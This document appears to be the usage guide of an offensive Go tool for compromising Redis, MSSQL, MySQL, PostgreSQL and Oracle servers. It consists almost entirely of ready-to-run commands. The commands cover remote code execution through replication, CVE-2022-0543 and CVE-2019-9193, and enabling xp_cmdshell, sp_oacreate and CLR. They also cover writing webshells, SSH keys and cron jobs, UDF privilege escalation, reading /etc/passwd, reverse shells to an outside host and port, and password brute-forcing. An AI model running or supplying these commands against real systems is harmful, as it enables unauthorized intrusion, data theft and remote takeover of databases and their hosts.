Redis

连接redis获取sql shell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -cli

主从复制RCE

//Linux
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -so exp.so
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -console -so exp.so

Lua沙盒绕过命令执行(CVE-2022-0543)

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -lua -console

写公钥

将ssh.txt文件中公钥替换成自己生成的

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -sshkey

写Webshell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -shell

定时任务

需要修改crontab.txt内容

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -crontab

MSSQL

连接数据库并获取一个sql shell

go run .\main.go -mssql -rhost 192.168.111.223 -rport 1433 -ruser sa -pwd "1qaz@WSX"  -cli

开启xp_cmdshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp

xp_cmdshell获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -console

xp_cmdshell执行单条系统命令

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isxp -docmd -cmd "whoami"

开启sp_oacreate

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp

sp_oacreate获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -console

sp_oacreate执行单条系统命令

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -issp -docmd -cmd "whoami"

CLR获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -console

CLR执行单条系统命令

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isclr -docmd -cmd "whoami"

log备份写getshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -shell -logshell -path "C:\phpStudy\WWW\aa.php" -e 'php'

差异备份getshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -difshell -path "C:\phpStudy\WWW\shell.php" -e 'php'

SSH连接

go run .\main.go -ssh -ruser root -rhost 192.168.111.139 -pwd "1qaz@WSX"

Mysql

连接获取sql shell

go run .\main.go -mysql -ruser root -rhost 192.168.111.134 -pwd "root" -rport 3306 -cli

into out file获取webshell

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -outfileshell -path "C:\\\\phpStudy\\\\WWW\\\\\aaa.php"

全局日志getshell

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -generallog -path C:\\\\phpStudy\\\\WWW\\\\aam.php

udf提权

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -udf

postgresql

连接postgre数据库获取sql shell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.162 -rport "5432" -cli

利用CVE-2019-9193循环执行命令

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -console

利用CVE-2019-9193执行单条命令

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -cmd "pwd"

单次文件读取(方法一)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -file "/etc/passwd"

循环文件读取(方法一)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -console

单次文件读取(方法二)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -file "/etc/passwd"

把hex值转换string即为结果

循环文件读取(方法二)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -console

列目录

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -file "./"

循环列目录

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -console

上传webshell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -write -uploadpath "/tmp/shell.jsp" -e "jsp"

Oracle

使用之前需要安装oracle客户端 Windows下安装方法 解压下载的instantclient_21_8压缩包，将解压路径添加到系统变量path Linux下正常支持Redis、Mysql、SQL Server、Postgresql，如想使用Oracle功能需要安装Oracle客户端驱动。在Kali下所有功能可完美运行

获取sql shell

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser test -pwd "1qaz@WSX" -sid helowin -cli

DBMS_Export_Extention循环执行命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -console

DBMS_Export_Extention执行单条命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -docmd -cmd "whoami"

DBMS_Export_Extention反弹shell

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -dee -re

DBMS_XMLQUERY循环执行系统命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -console

DBMS_XMLQUERY执行单条系统命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -docmd -cmd "whoami"

卸载命令执行函数

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -del

dbms_java_test.funcall反弹shell

 go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -fc 

爆破数据库账号密码

Mysql

go run .\main.go -rhost 192.168.111.206 -rport 3306 -crack -m mysql

MSSQL

go run .\main.go -rhost 192.168.111.223 -rport 1433 -crack -m mssql

Postgresql

go run .\main.go -rhost 192.168.111.211 -rport 5432 -crack -m postgresql

Redis

go run .\main.go -rhost 192.168.111.211 -rport 6379 -crack -m redis

Oracle

go run .\main.go -rhost 192.168.111.211 -rport 1521 -crack -m oracle